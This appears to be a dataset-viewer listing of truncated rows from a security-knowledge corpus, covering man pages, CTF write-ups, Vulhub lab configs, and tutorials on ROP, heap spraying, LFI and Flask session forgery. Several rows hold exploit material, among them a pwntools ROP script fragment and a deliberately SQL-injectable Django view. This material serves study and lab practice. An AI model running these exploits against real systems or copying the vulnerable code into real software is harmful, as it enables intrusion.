text
stringlengths
100
9.93M
category
stringclasses
11 values
.TH CHVT 1 "1997年10月7日" "控制台工具" "Linux用户手册" .SH NAME(名称) chvt \- 修改虚拟终端的前台环境 .SH SYNOPSIS(总览) .BI chvt N .SH DESCRIPTION(描述) .B chvt .I N 命令用来生成 .RI /dev/tty N 的前台终端.如果它本来不存在,即创建相应的屏幕.为了删除掉 不用的VT(虚拟终端),可使用 .BR deallocvt (1). 键映射操作 .RI `Console_ N ' (通常绑定为键组合 .RI (Ctrl\-)LeftAlt\-F N , .I N 在1-12的范围里取值, 而 .RI RightAlt\-...
sec-knowleage
## Android Dynamic Analysis 传送门:[門](https://github.com/secmobi/wiki.secmobi.com/) [四个参数搞定安卓驱动fuzzing](http://www.freebuf.com/tools/92638.html) [DIVA Android - Damn Insecure and vulnerable App for Android](https://github.com/payatu/diva-android/) [2016年Android手机平台最佳黑客应用汇总](http://www.easyaq.org/info/infoLink?id=18486397...
sec-knowleage
version: '2' services: web: image: vulhub/goahead:5.1.4 ports: - "8080:80" volumes: - ./index:/var/www/goahead/cgi-bin/index
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "COPY" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME COPY \- 在表和文件之间拷贝数据 .SH SYNOPSIS .sp .nf COPY \fItablename\fR [ ( \fIcolumn\fR [, ...] ) ] FROM { '\fIfilename\fR' | STDIN } [ [ WITH ] [ BINARY ] [ OIDS ...
sec-knowleage
lastb === 列出登入系统失败的用户相关信息 ## 补充说明 **lastb命令** 用于显示用户错误的登录列表,此指令可以发现系统的登录异常。单独执行lastb命令,它会读取位于`/var/log`目录下,名称为btmp的文件,并把该文件内容记录的登入失败的用户名单,全部显示出来。 ### 语法 ```shell lastb(选项)(参数) ``` ### 选项 ```shell -a:把从何处登入系统的主机名称或ip地址显示在最后一行; -d:将IP地址转换成主机名称; -f<记录文件>:指定记录文件; -n<显示列数>或-<显示列数>:设置列出名单的显示列数; -R:不显示登入系统的主机名称或IP地址; -x:显示系...
sec-knowleage
# 面试问题 --- ## 自由发挥的那种 - 打过几次护网 - 护网里面怎么做信息收集 - 怎么绕 cdn - 遇到的常见的 web 漏洞有哪些 - 描述一下你印象最深的渗透案例 - 你平时端口扫描的所使用的工具有哪些,为什么选择这个工具,有对比过速度吗 - 掌握哪些编程语言,会不会用 python 写 poc 或 exp, 写过哪些 poc? - 只给你一个单位名称,如何进行信息收集 - 最近关注哪些漏洞,比如 spring4shell,log4j 这些你有跟踪吗? - 怎么接触到安全行业的 - 你目前的工作情况是怎么样的? 评价下自己的同事水平? - 平时挖 src 吗? 讲一讲印象比较深刻的案例? - 如果目标是政府单位,如...
sec-knowleage
# 2021-9-第七届工控信息安全攻防竞赛 --- ## 签到 flag格式flag{xx_xx_xx_xx} 搜索协议s7comm 找到报错点黑色部分,得到flag --- ## IEC104 查看压缩包内隐藏的信息,flag格式:flag{xxx} 伪加密,提取到流量包 搜索 flag ,这个图片中存在一个压缩包 将图片下载,压缩包分离出来,得到 flag.txt 看特征像 AES ,在一开始的压缩包找到KEY 3des 解密得到 flag --- ## error 查看附件以获取flag wireshark 跟踪TCP流 --- ## family_bucket61 根据附件解出flag 凯撒偏移13位 ``` 4B555A...
sec-knowleage
def KSA(key): keylength = len(key) S = range(256) j = 0 for i in range(256): j = (j + S[i] + key[i % keylength]) % 256 S[i], S[j] = S[j], S[i] # swap return S def PRGA(S): i = 0 j = 0 while True: i = (i + 1) % 256 j = (j + S[i]) % 256 S[i], S...
sec-knowleage
.\" This file Copyright 1992,93 Michael K. Johnson (johnsonm@stolaf.edu) .\" Copyright 1995,1996 Miquel van Smoorenburg <miquels@cistron.nl> .\" Copyright 1997-2000 Jukka Lahtinen <walker@clinet.fi> .\" It may be distributed under the GNU Public License, version 2, or .\" any higher version. See section COPYING of the...
sec-knowleage
# Hatter Category: Reversing, 500 Points ## Description > Hello agent! > > According to our intelligence, the organization’s engineers are celebrating their evil inventions by having a party in which everyone is wearing the same crazy hat. > > We must send agent to the party to find out what they’re up to. The only w...
sec-knowleage
# What's My Name? Forensics, 250 points ## Description: > Say my name, say my name. A pcap file was attached ("myname.pcap"). ## Solution: We can use WireShark to inspect the network capture via a GUI, or `tshark` as a command line utility. First, we search for packets containing the word "name": ```console root@kali:/...
sec-knowleage
# The Heap 堆在初始化时, 会检查`heap flags`, 并视一些标志位的有无设置而对环境作出额外的改变. 像`Themida`就有采用这种方法来检测调试器. 比如: * 如果设置了`HEAP_TAIL_CHECKING_ENABLED`标志(见`Heap Flags`节), 那么在32位windows中就会在分配的堆块尾部附加2个`0xABABABAB`(64位环境就是4个). * 如果设置了`HEAP_FREE_CHECKING_ENABLED`(见`Heap Flags`节)标志, 那么当需要额外的字节来填充堆块尾部时, 就会使用`0xFEEEFEEE`(或一部分)来填充 那么, 一种新的检测调试器的方法就是来检...
sec-knowleage
dhcpd === 运行DHCP服务器 ### 语法 ```shell dhcpd [选项] [网络接口] ``` ### 选项 ```shell -p <端口> 指定dhcpd监听的端口 -f 作为前台进程运行dhcpd -d 启用调试模式 -q 在启动时不显示版权信息 -t 简单地测试配置文件的语法是否正确的,但不会尝试执行任何网络操作 -T 可以用来测试租约数据库文件 -4 运行DHCP服务器 -6 运行DHCPv6服务器 -s <服务器> 指定发送回复的服务器 -cf <配置文件> 指定配置文件 -lf <租约文件> 指定租约文件 -pf <PID文件> 指定PID文件 -tf <跟踪输出文件> 指定文件记录DHCP服务...
sec-knowleage
# flask --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## session伪造 flask-session 的三部分为 json->zlib->base64 后的源字符串. 时间戳. hmac 签名信息 **相关文章** - [flask session伪造admin身份](https://blog.csdn.net/since_2020/article/details/119543172) **相关工具** - [noraj/flask-session-cookie-manager](https://github.com/noraj...
sec-knowleage
# HeXdump (misc, 202p, 62 solved) In the challenge we get source code of a [service](heXDump.rb) and access to this service. The logic of the application is pretty simple: - We can select `output mode` from MD5, SHA1 and AES hexdump. - We can write some data into the `input file`. - We can request to get back data from...
sec-knowleage
# Can't See You * Category: Misc. * 200 Points * Solved by the JCTF Team ## Description > It's too dark in here, can you help Alice find her way out? > > docker run -it g3rzi/rabbit_hole bash ## Solution Let's run the attached docker. ``` |\\ //( | \\ // ' ' \\ // / \ )\(( / )` ...
sec-knowleage
.\" Copyright (c) 1990, 1991 The Regents of the University of California. .\" All rights reserved. .\" .\" This code is derived from software contributed to Berkeley by .\" Chris Torek and the American National Standards Committee X3, .\" on Information Processing Systems. .\" .\" Redistribution and use in source and b...
sec-knowleage
# 黑灰产形式 此章节整理了黑灰产的不同形式 ## 1. 按内容划分 ### 1.1 赌博类 #### 博彩(菠菜) TODO #### 开箱网站(基于Steam市场) > 开箱网站吸引人的策略和博彩网站无异,一开始时会先让你尝到甜头,开出价值较高的游戏皮肤,刺激你继续消费,后门逐步降低爆出率。玩家最终走出了自古以来的赌博路线:“开箱-获利-继续开-损失-想要挽回损失-损失更大“。 > > https://ti.qianxin.com/blog/articles/southeast-asian-gaming-industry-research-report/ ### 1.2 外挂 #### 场控外挂 从直播行业中衍生出的一种外挂形...
sec-knowleage
# 中级ROP 中级 ROP 主要是使用了一些比较巧妙的 Gadgets。 ## ret2csu ### 原理 在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的gadgets。 这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。这个函数是用来对 libc 进行初始化操作的,而一般的程序都会调用 libc 函数,所以这个函数一定会存在。我们先来看一下这个函数(当然,不同版本的这个函数有一定的区别) ```asm .text:00000000004005C0 ; void _libc_csu_init(void) .text:0000000...
sec-knowleage
# Docker未授权访问漏洞 ## 漏洞描述 恶意攻击者可以在未经授权的情况下访问 Docker 服务器或容器。这可能导致敏感数据泄露,或允许攻击者执行未经授权的操作,如添加、修改或删除容器。 ## 环境搭建 安装docker ``` yum install -y docker ``` 修改`/usr/lib/systemd/system/docker.service`服务,启动API接口。 ``` ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock ``` ![image-20220726104747298](....
sec-knowleage
## 享元(Flyweight) ### Intent 利用共享的方式来支持大量细粒度的对象,这些对象一部分内部状态是相同的。 ### Class Diagram - Flyweight:享元对象 - IntrinsicState:内部状态,享元对象共享内部状态 - ExtrinsicState:外部状态,每个享元对象的外部状态不同 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/5f5c22d5-9c0e-49e1-b5b0-6cc7032724d4.png"/> </div><br> ### Impl...
sec-knowleage
## Local File Inclusion (LFI) ## Introduction Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server ## Where to find - Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` ## How to exploit 1...
sec-knowleage
# AES ## 基本介绍 Advanced Encryption Standard(AES),高级加密标准,是典型的块加密,被设计来取代 DES,由 Joan Daemen 和 Vincent Rijmen 所设计。其基本信息如下 - 输入:128 比特。 - 输出:128 比特。 - SPN 网络结构。 其迭代轮数与密钥长度有关系,如下 | 密钥长度(比特) | 迭代轮数 | | :--------------: | :------: | | 128 | 10 | | 192 | 12 | | 256 | 14 | ...
sec-knowleage
# Baby RSA (crypto, 74p, 137 solved) In the challenge we get [code](rsa.sage), the [public key](pubkey.py) and the [result](flag.enc). Encryption is rather simple: ```python R.<a> = GF(2^2049) def encrypt(m): global n assert len(m) <= 256 m_int = Integer(m.encode('hex'), 16) m_poly = P(R.fetch_int(m_int...
sec-knowleage
## A numbers game II (PPC/Crypto, 70p) Description: Math is used in cryptography, but someone got this wrong. Can you still solve the equations? Hint: You need to encode your answers. ###ENG [PL](#pl-version) Server sends input as: Hi, I like math and cryptography. Can you talk to me?! Level 1.: 4.4.5.3.3.3.3.3.3...
sec-knowleage
# Tamarin (re, 224p, 42 solved) We're given an android apk that has a single text entry that acts as a flag check: ![](scr.png) The apk turns out to be a Ahead-Of-Time compiled Xamarin application. When searching for xamarin internals, we've came across a very [helpful SO thread](https://reverseengineering.stackexchang...
sec-knowleage
### 古典密码分析思路 CTF 中有关古典密码的题目,通常是根据密文求出明文,因此采用**唯密文攻击**居多,基本分析思路总结如下: 1. 确定密码类型:根据题目提示、加密方式、密文字符集、密文展现形式等信息。 2. 确定攻击方法:包括直接分析、蛮力攻击、统计分析等方法。对于无法确定类型的特殊密码,应根据其密码特性选用合适的攻击方法。 3. 确定分析工具:以在线密码分析工具与 Python 脚本工具包为主,以离线密码分析工具与手工分析为辅。 以上唯密文攻击方法的适用场景与举例如下: | 攻击方法 | 适用场景 | 举例 ...
sec-knowleage
# 18.2 删除链表中重复的结点 [牛客网](https://www.nowcoder.com/practice/fc533c45b73a41b0b44ccba763f866ef?tpId=13&tqId=11209&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 <div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/17e301df-52e8-4...
sec-knowleage
#!/usr/bin/python2 from cStringIO import StringIO from pwn import * def attack(connection): pathname = "/home/warmup/flag\x00" buffer = StringIO() buffer.write(p32(0x0804811d)) # sys_read buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret ...
sec-knowleage
# Matrix CTF 2021 - אתגר מטריקס 2021 Writeups for the [2021 Matrix CTF](https://ctf.matrixcyberlabs.com/). Solved with zVaz and YaakovC. We solved the challenges third, congratulations to Canlex who solved them first and unblvr who solved them second. Additional resources (including other writeups) can be found [here](...
sec-knowleage
# T1518-win-发现安全软件 ## 来自ATT&CK的描述 攻击者可能会试图获取安装在系统或云环境中的软件和软件版本的清单。攻击者可能会在自动发现过程中使用来自[软件发现](https://attack.mitre.org/techniques/T1518)的信息来制定后续行为,包括攻击者是否完全获得目标权限或尝试特定攻击手法。 攻击者可能出于各种原因试图列举软件,例如弄清有哪些安全措施,或者被攻击的系统是否有容易被利用来进行特权升级的软件版本。 ## 测试案例 ### 测试1 Find and Display Internet Explorer Browser Version 查询注册表以确定系统上安装的Internet ...
sec-knowleage
ldd === 打印程序或者库文件所依赖的共享库列表 ## 补充说明 **ldd命令** 用于打印程序或者库文件所依赖的共享库列表。 ### 语法 ```shell ldd(选项)(参数) ``` ### 选项 ```shell --version:打印指令版本号; -v:详细信息模式,打印所有相关信息; -u:打印未使用的直接依赖; -d:执行重定位和报告任何丢失的对象; -r:执行数据对象和函数的重定位,并且报告任何丢失的对象和函数; --help:显示帮助信息。 ``` ### 参数 文件:指定可执行程序或者文库。 ### 其他介绍 首先ldd不是一个可执行程序,而只是一个shell脚本 ldd能够显示可执行模块的de...
sec-knowleage
# COBOL (RE, 485p, 10 solved) In the task we get an old [IBM SAVF file](EKO.SAVF). Unlike last year, where we could just load it to some online tools, this time the file was corrupted. We quickly had a look around at the file contents, decoded from ebcdic string encoding, but the flag string seemed permutated, so we gu...
sec-knowleage
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14 .\" .\" Standard preamble: .\" ======================================================================== .de Sh \" Subsection heading .br .if t .Sp .ne 5 .PP \fB\\$1\fR .PP .. .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de ...
sec-knowleage
# CyberTank AutoPilot Miscellaneous ## Geo distance (100 points) > CyberTank's autopilot backup system is not responding. Can you respond to the backup system's distance calculation? > > Flag format: CTF{32-hex} A TCP server address was attached. Let's connect to it: ```console root@kali:/media/sf_CTFs/hackazon/Cyber...
sec-knowleage
version: '2' services: php: image: vulhub/php:5.4.1-cgi volumes: - ./www:/var/www/html ports: - "8080:80"
sec-knowleage
quotaon === 激活Linux内核中指定文件系统的磁盘配额功能 ## 补充说明 **quotaon命令** 执行quotaon指令可开启磁盘对用户和群组的空间使用限制,但在开启前,各分区的文件系统根目录必须存在通过quotacheck命令创建的quota配置文件。 ### 语法 ```shell quotaon(选项)(参数) ``` ### 选项 ```shell -a:开启在/ect/fstab文件里,有加入quota设置的分区的空间限制; -g:开启群组的磁盘空间限制; -u:开启用户的磁盘空间限制; -v:显示指令指令执行过程。 ``` ### 参数 文件系统:指定要激活磁盘配额功能的文件系统。
sec-knowleage
# SCS CTF 2018 Team: msm, rev, nazywam, rodbert, sasza, chivay, des, eternal, psrok1 ### Table of contents * [binary (re)](re_binary) * [xors (crypto)](crypto_xor) * [rots (crypto)](crypto_rot) * [serialize (web)](web_serialize) ### Notes: Actually there was a 3-person limit for a team, so we started as three separate ...
sec-knowleage
# Writeups for Confidence Teaser 2016 Team: c7f.m0d3, akrasuski1, cr019283, nazywam, shalom, mnmd21891, msm, rev ### Table of contents * [Amazeing](network_ppc_amazeing)
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: close.n,v 1.2 2003/11/24 05:09:59 ...
sec-knowleage
# 加固 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * **[基线核查](#基线核查)** * **[操作系统](#操作系统)** * [Linux](#linux) * [Windows](#windows) * **[web服务和中间件](#web服务和中间件)** * **[业务软件](#业务软件)** * [数据库](#数据库) * [mysql](#mysql) * [远程服务](#远程服务) * [SSH](#ssh) --- ## 基线核查 **资源...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "CREATE OPERATOR CLASS" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME CREATE OPERATOR CLASS \- 定义一个新的操作符类 .SH SYNOPSIS .sp .nf CREATE OPERATOR CLASS \fIname\fR [ DEFAULT ] FOR TYPE \fIdata_type\fR USING \fIindex_method\fR AS { OPERATO...
sec-knowleage
# Spring WebFlow 远程代码执行漏洞(CVE-2017-4971) Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。 参考链接: - https://threathunter.org/topic/593d562353ab369c55425a90 - https://pivotal.io/security/cve-2017-4971 ## 测试环境 运行测试环境: ``` docker compose u...
sec-knowleage
# ntopng Authentication Bypass (CVE-2021-28073) [中文版本(Chinese version)](README.zh-cn.md) Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng 4.2 and previous versions. Refer...
sec-knowleage
### Heap Spray介绍 **堆喷射**(heap spraying)指的是一种辅助攻击手法:「**通过大量分配相同的结构体来达成某种特定的内存布局**,从而帮助攻击者完成后续的利用过程」,常见于如下场景: - 你有一个 UAF,但是**你无法通过少量内存分配拿到该结构体**(例如该 object 不属于当前 freelist 且释放后会回到 node 上,或是像 `add_key()` 那样会被一直卡在第一个临时结构体上),这时你可以**通过堆喷射来确保拿到该 object**。 - 你有一个堆溢出读/写,但是**堆布局对你而言是不可知的**(比如说开启了 `SLAB_FREELIST_RANDOM`(默认开启)),你可以...
sec-knowleage
# Ghost pepper (web, 125p, 78 solved) In the challenge we get a link to webpage which requests Basic Auth from us. As a hint the page says `karaf`. Karaf is OSGi provider, and coincidentally the default user/password for the web interface is `karaf:karaf`. Now that we passed the authentication, we try to look around, b...
sec-knowleage
# FreeMarker **FreeMarker 模版语言说明** - 文本:包括 HTML 标签与静态文本等静态内容,该部分内容会原样输出 - 插值:语法为 `${}`, 这部分的输出会被模板引擎计算的值来替换。 - 指令标签:`<#>` 或者 `<@ >` 。如果指令为系统内建指令,如 assign 时,用 `<# >` 。如果指令为用户指令,则用 `<@ >` 。利用中最常见的指令标签为 `<#assign>` ,该指令可创建变量。 - 注释:由 `<#--` 和 `-->` 表示,注释部分的内容会 FreeMarker 忽略
sec-knowleage
.\" Copyright (C) 2001 Andries Brouwer <aeb@cwi.nl>. .\" .\" Permission is granted to make and distribute verbatim copies of this .\" manual provided the copyright notice and this permission notice are .\" preserved on all copies. .\" .\" Permission is granted to copy and distribute modified versions of this .\" manual...
sec-knowleage
from django.shortcuts import HttpResponse from .models import Collection # Create your views here. def vul(request): query = request.GET.get('order', default='id') q = Collection.objects.order_by(query) return HttpResponse(q.values())
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH SHA384SUM 1 2022年9月 "GNU coreutil...
sec-knowleage
# T1135-win-网络共享发现 ## 来自ATT&CK的描述 网络通常包含共享的网络驱动器和文件夹,使用户可以通过网络访问不同系统上的文件目录。 Windows Windows网络上的文件共享通过SMB协议进行。 Net可用于使用Net view\remote system命令查询远程系统中的可用共享驱动器。它还可用于使用网络共享查询本地系统上的共享驱动器。 攻击者可能会寻找在远程系统上共享的文件夹和驱动器,作为识别信息源的一种方法,以收集作为攻击的前兆,并识别可能感兴趣的横向移动系统。 Mac 在Mac上,可以使用df-aH命令查看本地安装的共享。 云 云虚拟网络可能包含远程网络共享或文件存储服务,攻击者在获得对系统的访问权...
sec-knowleage
# Defcamp CTF Finals 2017 Team: c7f.m0d3, psrok1, rev, shalom, lacky ### Table of contents * [State agency (web)](state_agency) * [Caesar favourite song (misc/crypto)](favourite_song) * [Audio captcha (misc)](audio_captcha) * [Adversarial (misc)](adversarial) * [Hack tac toe (web/crypto)](hack_tac_toe) * [Fedora shop (...
sec-knowleage
#!/usr/bin/env ruby require 'sinatra/base' require 'sinatra/cookies' require 'openssl' require 'json' KEY = IO.binread('super-secret-key') FLAG = IO.read('/home/simple/flag').strip class SimpleApp < Sinatra::Base helpers Sinatra::Cookies get '/' do auth = cookies[:auth] if auth begin auth ...
sec-knowleage
require 'erb' require 'webrick' require 'fileutils' require 'securerandom' include WEBrick::HTTPStatus FileUtils.rm_rf('/tmp/flags') FileUtils.mkdir_p('/tmp/flags') FileUtils.cp('flag.txt', "/tmp/flags/#{SecureRandom.alphanumeric(32)}.txt") FileUtils.rm('flag.txt') server = WEBrick::HTTPServer.new Port: 9292 de...
sec-knowleage
# Django < 2.0.8 Open redirect possibility in CommonMiddleware (CVE-2018-14574) [中文版本(Chinese version)](README.zh-cn.md) If the `django.middleware.common.CommonMiddleware` and the `APPEND_SLASH` setting are both enabled, and if the project has a URL pattern that accepts any path ending in a slash, then a request to a...
sec-knowleage
# T1590-006-收集目标组织网络信息-网络安全设备 ## 来自ATT&CK的描述 攻击者可能会事先收集攻击目标的网络安全设备信息。网络安全设备的信息可能包括各种详细信息,例如已部署的防火墙,内容筛选器和代理/堡垒主机的存在和详细信息。攻击者还可能针对地收集有关受害者的网络入侵检测系统(NIDS)或其他与防御性网络安全操作有关的设备的信息。 攻击者可以通过不同的方式收集这些信息,例如通过[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)或[钓鱼](https://contribute.knowledge.qihoo.net/detail/t...
sec-knowleage
# Docker Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在电脑上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台 Docker。 > fofa : app="docker-产品" **相关文章** - [Docker容器安全性分析](https://www.freebuf.com/articles/system/221319.html) - [一些与Docker安全相关的知识点总结与整理](https://mp.weixin.qq.com/s/rKUpyEmurAioiMAFqYzfxg) - [...
sec-knowleage
# Writeup Plaid CTF 2016 Team: c7f.m0d3, akrasuski1, cr019283, nazywam, shalom, mnmd21891, msm, rev ### Table of contents * [Rabit (Crypto)](crypto_rabit) * [Tonnerre (Crypto)](crypto_tonnerre) * [Pixelshop (Web)](web_pixelshop) * [Hevc (Misc)](misc_hevc) * [Morset (Misc)](misc_morset) * [The stuff (Misc)](misc_t...
sec-knowleage
iperf === 网络性能测试工具 ## 补充说明 **iperf命令** 是一个网络性能测试工具。iperf可以测试TCP和UDP带宽质量。iperf可以测量最大TCP带宽,具有多种参数和UDP特性。iperf可以报告带宽,延迟抖动和数据包丢失。利用iperf这一特性,可以用来测试一些网络设备如路由器,防火墙,交换机等的性能。 iperf分为两种版本,Unix/Linux版和Windows版,Unix/Linux版更新比较快,版本最新。Windows版更新慢。Windows版的iperf叫jperf,或者xjperf。jperf是在iperf基础上开发了更好的UI和新的功能。 Linux版本下载地址:http://code.go...
sec-knowleage
# sqlmap软件包描述 sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统、执行操作系统命令。 特点: - 全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB数据库管理系统。 - 全面支持六种SQL注入技术:boolean-based盲注、time-based盲注、error-based、UNION...
sec-knowleage
# DES (Crypto 500) ###ENG [PL](#pl-version) The general idea was simple - the authors used double encryption with DES and Blowfish and the task was to decode the message. The problems: * Authors used some shady website for encryption and not the ciphers directly. This website was adding random paddings and without kno...
sec-knowleage
# Secure Logon Web Exploitation, 500 points ## Description: > Uh oh, the login page is more secure... I think. ```python from flask import Flask, render_template, request, url_for, redirect, make_response, flash import json from hashlib import md5 from base64 import b64decode from base64 import b64encode from Crypto i...
sec-knowleage
## 嗅探欺骗模块 |sniffing&spoofing|||||| |:-:|:-:|:-:|:-:|:-:|:-:| |[Burp Suite](Burp%20Suite.md)|[DNSChef](DNSChef.md)|[fiked](Fiked.md)|[hamster-sidejack](hamster-sidejack.md)|[Hexlnject](HexInject.md)|iaxflood| |iSMTP|isr-evilgrade|mitmproxy|ohrwurm|protos-sip|rebind| |responder|rtpbreak|rtpinsertsound|rtpmixsound|sctpsca...
sec-knowleage
'\" t .TH "VCONSOLE\&.CONF" "5" "" "systemd 231" "vconsole.conf" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http:...
sec-knowleage
dirname === 去除文件名中的非目录部分 ## 补充说明 **dirname命令** 去除文件名中的非目录部分,仅显示与目录有关的内容。dirname命令读取指定路径名保留最后一个`/`及其后面的字符,删除其他部分,并写结果到标准输出。如果最后一个`/`后无字符,dirname 命令使用倒数第二个`/`,并忽略其后的所有字符。dirname 和 basename 通常在 shell 内部命令替换使用,以指定一个与指定输入文件名略有差异的输出文件名。 ### 语法 ```shell dirname(选项)(参数) ``` ### 选项 ```shell --help:显示帮助; --version:显示版本号。 ``` #...
sec-knowleage
ipcalc === 简单的IP地址计算器 ## 补充说明 **ipcalc命令** 是一个简单的ip地址计算器,可以完成简单的IP地址计算任务。 ### 语法 ```shell ipcalc(选项) ``` ### 选项 ```shell -b:由给定的IP地址和网络掩码计算出广播地址; -h:显示给定UP地址所对应的主机名; -m:由给定的IP地址计算器网络掩码; -p:显示给定的掩码或IP地址的前缀; -n:由给定的IP地址和网络掩码计算网络地址; -s:安静模式; --help:显示帮助信息。 ``` ### 实例 ```shell [root@localhost ~]# ipcalc -p 192.168.2.1 2...
sec-knowleage
.\" %%%LICENSE_START(GPLv2+_DOC_FULL) .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your option) any later version. .\" .\" The GNU General Publi...
sec-knowleage
# SqlSRF (Web, 400p) ``` The root reply the flag to your mail address if you send a mail that subject is "give me flag" to root. ``` In the task initially we get access to a login screen and [source code of the index page](index.pl]). First goal is to somehow login into the system. In the sources we can see: ```perl if...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH FALSE 1 2022年9月 "GNU coreutils 9....
sec-knowleage
# LDAP --- 常用缩写词 - DN:Distinguished Name - CN:Common Name - OU:Organizational Unit - DC:Domain Component - ACE:Access Control Entries - ACL:Access Control List LDAP 连接服务器的连接字串格式为:ldap://servername/DN 其中 DN 有三个属性,分别是 CN、OU 和 DC
sec-knowleage
# 重要端口与服务 转载自:[Awesome-Redteam - 重要端口及服务](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/%E9%87%8D%E8%A6%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%9C%8D%E5%8A%A1%E9%80%9F%E6%9F%A5.md) ## 目录 [TOC] ## 薄弱端口服务 | port | service | description |...
sec-knowleage
# T1529-win-系统关机或重启 ## 来自ATT&CK的描述 攻击者可能会关闭或者重启系统,用来中断正常用户对这些系统的访问或者为了破坏这些系统。操作系统包含用于启动计算机关闭或重新启动的命令。在某些情况下,这些命令还可以用于远程计算机关闭或者重启。关闭或重新启动系统可能会干扰合法用户对计算机资源的访问。 攻击者可能会以其他方式(例如磁盘结构擦除或禁止系统恢复)对系统造成影响后尝试关闭或者重新引导系统,以加快对系统可用性的影响。 ## 测试案例 windows系统自带一个名为Shutdown.exe的程序,可以用于关机操作(位置在Windows\System32下),一般情况下Windows系统的关机都可以通过调用程序 sh...
sec-knowleage
#!/usr/bin/python import time; import random; FLAG = ''; def cycleLen(data, place): seen = {}; count = 0; while not place in seen: seen[place] = 1; count += 1; place = data[place]; return count; def realSign(data): res = 1; for i in range(256): res *= cycleLen(map(ord, data), i); return res; import ...
sec-knowleage
# T1546-012-win-事件触发执行-图片文件执行选项注入 ## 来自ATT&CK描述 攻击者可以通过执行由图像文件执行选项 (IFEO) 调试器触发的恶意内容来建立持久性或权限提升。IFEO使开发人员能够将调试器附加到应用程序。创建进程时,应用程序的IFEO中的调试器将附加到应用程序的名称之前,从而有效地在调试器下启动新进程(例如,`C:\dbg\ntsd.exe -g notepad.exe`)。 IFEO可以通过注册表直接设置,也可以通过GFlags工具在Global Flags中设置。IFEO表示为`Debugger`注册表中的值,在那里是附加调试器的二进制文件`HKLM\SOFTWARE{{\Wow6432Node...
sec-knowleage
# Slot Machine Reloaded Category: Reversing, 300 Points ## Description > Remember the Slot Machine from CSA 2019? > > Well, this one is a little harder... ```python #!/usr/bin/env python3 import random import collections import math from .secret import flag PRINTABLE = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+...
sec-knowleage
.\" .\" 软件教程 之 man mirror 系统篇 软件篇 技巧篇 Linux man篇 .\" .\" 原始文件:mirror-2.3 - mirror.man .\" 档案叙述:映射远端档案的软体 .\" 文件编号:LRG.LDTP.MANUAL.006 .\" 翻译日期:1996/03/03 .\" 翻译维护:asdchen@ms1.hinet.net O .\" ---------------------------------------------------------------X--- .\" O .\" MIRROR(1L) MIRROR(1L) .\" .TH mirror 1 .SH NAME m...
sec-knowleage
chsh === 用来更换登录系统时使用的shell ## 补充说明 **chsh命令** 用来更换登录系统时使用的shell。若不指定任何参数与用户名称,则chsh会以应答的方式进行设置。 ### 语法 ```shell chsh(选项)(参数) ``` ### 选项 ```shell -s<shell 名称>或--shell<shell 名称>:更改系统预设的shell环境。; -l或--list-shells:列出目前系统可用的shell清单; -u或--help:在线帮助; -v或-version:显示版本信息。 ``` ### 参数 用户名:要改变默认shell的用户。 ### 实例 **查看系统安装了哪些she...
sec-knowleage
